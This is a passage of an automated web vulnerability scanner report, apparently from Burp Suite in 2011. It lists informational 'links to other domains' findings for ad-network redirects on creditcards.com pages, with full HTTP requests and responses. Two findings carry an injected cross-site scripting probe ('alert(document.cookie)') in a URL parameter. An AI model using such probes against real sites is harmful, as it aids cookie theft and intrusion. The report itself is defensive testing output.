Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 17 Jun 2011 12:12:56 GMT
Server: ads-affiliate-network-event-server
Content-Length: 479
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://citi.bridgetrack.com/usc/_spredir.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7EEEAC5C2D66E204E6&BT_TRF=42944&app=UNSOL&sc=4T3ZJR81&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer_631529047">here</A>
...[SNIP]...

15.13. http://gan.doubleclick.net/gan_click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gan.doubleclick.net
Path:	/gan_click

Issue detail

The page was loaded from a URL containing a query string:

http://gan.doubleclick.net/gan_click?lid=41000000015500165&pubid=21000000000112308&mid=11258e6c2011c0061f17070a12f553

The response contains the following link to another domain:

http://citi.bridgetrack.com/usc/_spredir.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6&BT_TRF=43153&app=UNSOL&sc=4DNZJG21&m=3CJ5MDQ95ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=ALS&t=t&link=Consumer_631529118

Request

GET /gan_click?lid=41000000015500165&pubid=21000000000112308&mid=11258e6c2011c0061f17070a12f553 HTTP/1.1
Host: gan.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22144656&pg=11&pgpos=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Found
Location: http://citi.bridgetrack.com/usc/_spredir.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6&BT_TRF=43153&app=UNSOL&sc=4DNZJG21&m=3CJ5MDQ95ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=ALS&t=t&link=Consumer_631529118
Cache-Control: private
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 17 Jun 2011 12:12:56 GMT
Server: ads-affiliate-network-event-server
Content-Length: 479
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://citi.bridgetrack.com/usc/_spredir.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6&BT_TRF=43153&app=UNSOL&sc=4DNZJG21&m=3CJ5MDQ95ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=ALS&t=t&link=Consumer_631529118">here</A>
...[SNIP]...

15.14. http://gan.doubleclick.net/gan_click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gan.doubleclick.net
Path:	/gan_click

Issue detail

The page was loaded from a URL containing a query string:

http://gan.doubleclick.net/gan_click?lid=41000000015500167&pubid=21000000000112308&mid=1113416820111306091707d412ba49

The response contains the following link to another domain:

http://citi.bridgetrack.com/usc/_spredir.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7EEEAC5C2D66E204E6&BT_TRF=42944&app=UNSOL&sc=4T3ZJR81&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer_631529043

Request

GET /gan_click?lid=41000000015500167&pubid=21000000000112308&mid=1113416820111306091707d412ba49 HTTP/1.1
Host: gan.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22144458&pg=11&pgpos=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Found
Location: http://citi.bridgetrack.com/usc/_spredir.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7EEEAC5C2D66E204E6&BT_TRF=42944&app=UNSOL&sc=4T3ZJR81&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer_631529043
Cache-Control: private
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 17 Jun 2011 12:12:52 GMT
Server: ads-affiliate-network-event-server
Content-Length: 479
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://citi.bridgetrack.com/usc/_spredir.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7EEEAC5C2D66E204E6&BT_TRF=42944&app=UNSOL&sc=4T3ZJR81&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer_631529043">here</A>
...[SNIP]...

15.15. http://gan.doubleclick.net/gan_click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gan.doubleclick.net
Path:	/gan_click

Issue detail

The page was loaded from a URL containing a query string:

http://gan.doubleclick.net/gan_click?lid=41000000032191799&pubid=21000000000112308&mid=1117231f20115b06cd1707b7120247

The response contains the following link to another domain:

http://citi.bridgetrack.com/usc/_spredir.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E9EAC5C2DE3E204E6&BT_TRF=42945&app=UNSOL&sc=4T3VJTP1&m=3CJ5MDQ94VW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKB&t=t&link=Consumer_631529117

Request

GET /gan_click?lid=41000000032191799&pubid=21000000000112308&mid=1117231f20115b06cd1707b7120247 HTTP/1.1
Host: gan.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22145581&pg=11&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Found
Location: http://citi.bridgetrack.com/usc/_spredir.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E9EAC5C2DE3E204E6&BT_TRF=42945&app=UNSOL&sc=4T3VJTP1&m=3CJ5MDQ94VW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKB&t=t&link=Consumer_631529117
Cache-Control: private
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 17 Jun 2011 12:12:52 GMT
Server: ads-affiliate-network-event-server
Content-Length: 479
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://citi.bridgetrack.com/usc/_spredir.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E9EAC5C2DE3E204E6&BT_TRF=42945&app=UNSOL&sc=4T3VJTP1&m=3CJ5MDQ94VW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKB&t=t&link=Consumer_631529117">here</A>
...[SNIP]...

15.16. http://gan.doubleclick.net/gan_click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gan.doubleclick.net
Path:	/gan_click

Issue detail

The page was loaded from a URL containing a query string:

http://gan.doubleclick.net/gan_click?lid=41000000031125666&pubid=21000000000112308&mid=111d1dca20115406dd17065f59f805&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D4%26tid%3D111d1dca20115406dd17065f59f805

The response contains the following link to another domain:

http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528252

Request

GET /gan_click?lid=41000000031125666&pubid=21000000000112308&mid=111d1dca20115406dd17065f59f805&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D4%26tid%3D111d1dca20115406dd17065f59f805 HTTP/1.1
Host: gan.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22105561&pg=17&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Found
Location: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528252
Cache-Control: private
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 17 Jun 2011 11:59:09 GMT
Server: ads-affiliate-network-event-server
Content-Length: 345
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528252">here</A>
...[SNIP]...

15.17. http://gan.doubleclick.net/gan_click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gan.doubleclick.net
Path:	/gan_click

Issue detail

The page was loaded from a URL containing a query string:

http://gan.doubleclick.net/gan_click?lid=41000000034398171&pubid=21000000000112308&mid=112cd5d92011ce062f17074f127857&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D3%26tid%3D112cd5d92011ce062f17074f127857

The response contains the following link to another domain:

https://www.applyonlinenow.com/USCCapp/Ctl/entry?sc=UABJCQ&GV10=H|267|K49670&GV1=H%7C143%7Cgan_631529122

Request

GET /gan_click?lid=41000000034398171&pubid=21000000000112308&mid=112cd5d92011ce062f17074f127857&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D3%26tid%3D112cd5d92011ce062f17074f127857 HTTP/1.1
Host: gan.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22065113&pg=11&pgpos=5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Found
Location: https://www.applyonlinenow.com/USCCapp/Ctl/entry?sc=UABJCQ&GV10=H|267|K49670&GV1=H%7C143%7Cgan_631529122
Cache-Control: private
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 17 Jun 2011 12:12:59 GMT
Server: ads-affiliate-network-event-server
Content-Length: 309
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="https://www.applyonlinenow.com/USCCapp/Ctl/entry?sc=UABJCQ&GV10=H|267|K49670&GV1=H%7C143%7Cgan_631529122">here</A>
...[SNIP]...

15.18. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3561925617094932&output=html&h=60&slotname=3676043548&w=468&lmt=1308329945&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2F&dt=1308311945510&bpp=1&shv=r20110608&jsv=r20110607&prev_slotnames=7157486477&correlator=1308311943903&frm=4&adk=615181127&ga_vid=305312364.1308311945&ga_sid=1308311945&ga_hid=969897588&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049&bih=893&eid=33895142&ref=http%3A%2F%2Fwww.creditcards.com%2Fpoints-rewards.php&fu=0&ifi=2&dtd=28&xpc=cZ5trv84Tt&p=http%3A//blogs.creditcards.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://blogs.creditcards.com/%26hl%3Den%26client%3Dca-pub-3561925617094932%26adU%3Dwww.AmericanExpress.com/JetBlue%26adT%3DThe%2BJetBlue%2BCard%26adU%3Dchoiceprivilegesvisa.com/creditcard%26adT%3DChoice%2BPrivileges%25C2%25AE%2BCard%26gl%3DUS&usg=AFQjCNGYEeBM2kYgWBq72g1WhcpVkZUicQ

Request

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=60&slotname=3676043548&w=468&lmt=1308329945&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2F&dt=1308311945510&bpp=1&shv=r20110608&jsv=r20110607&prev_slotnames=7157486477&correlator=1308311943903&frm=4&adk=615181127&ga_vid=305312364.1308311945&ga_sid=1308311945&ga_hid=969897588&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049&bih=893&eid=33895142&ref=http%3A%2F%2Fwww.creditcards.com%2Fpoints-rewards.php&fu=0&ifi=2&dtd=28&xpc=cZ5trv84Tt&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 17 Jun 2011 11:59:06 GMT
Server: cafe
Cache-Control: private
Content-Length: 10774
X-XSS-Protection: 1; mode=block

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000aa;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://blogs.creditcards.com/%26hl%3Den%26client%3Dca-pub-3561925617094932%26adU%3Dwww.AmericanExpress.com/JetBlue%26adT%3DThe%2BJetBlue%2BCard%26adU%3Dchoiceprivilegesvisa.com/creditcard%26adT%3DChoice%2BPrivileges%25C2%25AE%2BCard%26gl%3DUS&usg=AFQjCNGYEeBM2kYgWBq72g1WhcpVkZUicQ" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

15.19. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3561925617094932&output=html&h=60&slotname=7084479809&w=468&lmt=1308329973&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2Ffine-print%2F&dt=1308311973665&bpp=1&shv=r20110608&jsv=r20110607&prev_slotnames=7157486477&correlator=1308311972399&frm=4&adk=616904430&ga_vid=1977312224.1308311973&ga_sid=1308311973&ga_hid=683643976&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049&bih=893&ref=http%3A%2F%2Fblogs.creditcards.com%2F&fu=0&ifi=2&dtd=48&xpc=dEvocBvLju&p=http%3A//blogs.creditcards.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://blogs.creditcards.com/fine-print/%26hl%3Den%26client%3Dca-pub-3561925617094932%26adU%3Dwww.creditcardcolumn.com%26adT%3DTop%2B5%2BAirline%2BMiles%2BCards%26adU%3DFreeScore.com/Free-Credit-Scores%26adT%3D3-Bureau%2BCredit%2BReport%26gl%3DUS&usg=AFQjCNGoM-v4J7s_LJ9SwidORlbeSH15Ww

Request

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=60&slotname=7084479809&w=468&lmt=1308329973&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2Ffine-print%2F&dt=1308311973665&bpp=1&shv=r20110608&jsv=r20110607&prev_slotnames=7157486477&correlator=1308311972399&frm=4&adk=616904430&ga_vid=1977312224.1308311973&ga_sid=1308311973&ga_hid=683643976&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049&bih=893&ref=http%3A%2F%2Fblogs.creditcards.com%2F&fu=0&ifi=2&dtd=48&xpc=dEvocBvLju&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 17 Jun 2011 11:59:34 GMT
Server: cafe
Cache-Control: private
Content-Length: 10620
X-XSS-Protection: 1; mode=block

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000aa;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://blogs.creditcards.com/fine-print/%26hl%3Den%26client%3Dca-pub-3561925617094932%26adU%3Dwww.creditcardcolumn.com%26adT%3DTop%2B5%2BAirline%2BMiles%2BCards%26adU%3DFreeScore.com/Free-Credit-Scores%26adT%3D3-Bureau%2BCredit%2BReport%26gl%3DUS&usg=AFQjCNGoM-v4J7s_LJ9SwidORlbeSH15Ww" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

15.20. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308330670&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2Ffine-print%2F%3F3cf6d%2522-alert(document.cookie)-%2522cf7270b0551%3D1&dt=1308312670646&bpp=3&shv=r20110608&jsv=r20110607&correlator=1308312670694&frm=4&adk=2114403254&ga_vid=526911810.1308312671&ga_sid=1308312671&ga_hid=970325886&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049&bih=893&ref=http%3A%2F%2Fburp%2Fshow%2F6&fu=0&ifi=1&dtd=431&xpc=T8oapHovvd&p=http%3A//blogs.creditcards.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://blogs.creditcards.com/fine-print/%253F3cf6d%252522-alert(document.cookie)-%252522cf7270b0551%253D1%26hl%3Den%26client%3Dca-pub-3561925617094932%26adU%3DFastTrackDebtRelief.com%26adT%3DCredit%2BCard%2BConsolidation%26adU%3Dwww.SmartCreditChoices.com/CashBack%26adT%3D5%2525%2BCash%2BBack%2BCredit%2BCards%26adU%3Dchoiceprivilegesvisa.com/creditcard%26adT%3DChoice%2BPrivileges%25C2%25AE%2BCard%26gl%3DUS&usg=AFQjCNE9rei01bZGynuQB27Hs2vv3S8LqA

Request

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308330670&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2Ffine-print%2F%3F3cf6d%2522-alert(document.cookie)-%2522cf7270b0551%3D1&dt=1308312670646&bpp=3&shv=r20110608&jsv=r20110607&correlator=1308312670694&frm=4&adk=2114403254&ga_vid=526911810.1308312671&ga_sid=1308312671&ga_hid=970325886&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049&bih=893&ref=http%3A%2F%2Fburp%2Fshow%2F6&fu=0&ifi=1&dtd=431&xpc=T8oapHovvd&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 17 Jun 2011 12:11:11 GMT
Server: cafe
Cache-Control: private
Content-Length: 14005
X-XSS-Protection: 1; mode=block

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#000066;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://blogs.creditcards.com/fine-print/%253F3cf6d%252522-alert(document.cookie)-%252522cf7270b0551%253D1%26hl%3Den%26client%3Dca-pub-3561925617094932%26adU%3DFastTrackDebtRelief.com%26adT%3DCredit%2BCard%2BConsolidation%26adU%3Dwww.SmartCreditChoices.com/CashBack%26adT%3D5%2525%2BCash%2BBack%2BCredit%2BCards%26adU%3Dchoiceprivilegesvisa.com/creditcard%26adT%3DChoice%2BPrivileges%25C2%25AE%2BCard%26gl%3DUS&usg=AFQjCNE9rei01bZGynuQB27Hs2vv3S8LqA" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

15.21. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3561925617094932&output=html&h=60&slotname=7084479809&w=468&lmt=1308330672&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2Ffine-print%2F%3F3cf6d%2522-alert(document.cookie)-%2522cf7270b0551%3D1&dt=1308312672124&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=7157486477&correlator=1308312670694&frm=4&adk=616904430&ga_vid=526911810.1308312671&ga_sid=1308312671&ga_hid=970325886&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049&bih=893&ref=http%3A%2F%2Fburp%2Fshow%2F6&fu=0&ifi=2&dtd=72&xpc=BkYCvQVw2P&p=http%3A//blogs.creditcards.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
